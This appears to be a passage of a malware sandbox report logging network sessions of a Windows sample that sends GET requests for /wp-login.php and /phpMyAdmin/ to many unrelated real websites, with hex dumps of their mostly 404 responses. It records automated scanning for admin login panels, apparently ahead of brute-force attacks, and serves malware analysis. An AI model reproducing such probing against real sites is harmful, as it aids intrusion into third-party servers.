                                                                                                                                                                                                    2023-11-26 05:59:38 UTC378INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, m
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16006INData Raw: 65 34 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 a4 a7 e6 98 ad e5 b7 a5 e6 a5 ad e6 a0 aa e5 bc 8f e4 bc 9a e7 a4 be 20 7c 20 e3 81 94 e3 81 bf e5 8f 8e e9 9b 86 e3 83 bb e6 8e 92 e6 b0 b4 e5 87 a6 e7 90 86 e8 a8 ad e5 82 99 e3 81 ae e7 b6 ad e6 8c 81 e7 ae a1 e7 90 86 20 7c 20 e5 90 8d e5 8f a4 e5 b1 8b e5 b8 82 e3 83 bb e6 84 9b e7 9f a5
                                                                                                                                                                                                    Data Ascii: e457<!DOCTYPE html><html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title> | |
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 2d 63 68 69 6c 64 32 5f 5f 75 6c 5f 5f 6c 69 6e 6b 5f 5f 64 69 76 20 69 73 2d 64 69 76 34 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 69 73 2d 63 68 69 6c 64 32 5f 5f 75 6c 5f 5f 6c 69 5f 5f 74 78 74 20 69 73 2d 70 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 0a 20 20 20 20
                                                                                                                                                                                                    Data Ascii: <div class="is-child2__ul__link__div is-div4"> </div> <p class="is-child2__ul__li__txt is-p4"> <span>
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 73 76 67 22 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 69 6d 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 69 63 74 75 72 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 64 69 76 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e8 b3 87 e6 ba 90 e5 be aa e7 92 b0 e4 ba 8b e6 a5 ad 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: svg" class="p-index__business__img1"> </picture> <div class="p-index__business__div1"> <p class="p-index__business__title"> </p>
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC9694INData Raw: e3 81 94 e3 81 bf e3 81 ae e5 8f 8e e9 9b 86 ef bc 88 e5 90 8d e5 8f a4 e5 b1 8b e5 b8 82 ef bc 89 e3 81 8c e5 a7 8b e3 81 be e3 82 8a e3 81 be e3 81 97 e3 81 9f e3 80 82 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 6e 65 77 73 5f 5f 6c 69 73 74 5f 5f 63 61 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e3 81 8a e7 9f a5 e3 82 89 e3 81 9b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20
                                                                                                                                                                                                    Data Ascii: </p> <p class="p-index__news__list__cat"> </p>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    187192.168.2.45975315.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC172OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC15911INData Raw: 37 39 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7970<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC15190INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    188192.168.2.45975034.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 37 2e 38 33 33 31 30 33 35 31 36 33 30 34 36 32 38 34 35 35 35 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978377.8331035163046284555Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    189192.168.2.459690159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    190192.168.2.45973554.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC173OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    191192.168.2.45994934.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:37 UTC178OUTGET /en/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
